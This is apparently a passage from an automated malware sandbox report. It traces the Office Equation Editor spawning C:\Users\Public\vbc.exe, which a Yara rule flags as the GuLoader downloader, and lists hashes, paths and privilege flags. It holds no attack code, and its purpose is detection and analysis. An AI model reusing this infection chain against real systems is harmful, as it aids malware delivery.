      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:2
      Start time:10:40:43
      Start date:26/01/2022
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Target ID:4
      Start time:10:40:45
      Start date:26/01/2022
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:"C:\Users\Public\vbc.exe"
      Imagebase:0x400000
      File size:170120 bytes
      MD5 hash:0DCB37FF90B93B7A3225707B1AF111B8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.680919956.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
      Reputation:low

      No disassembly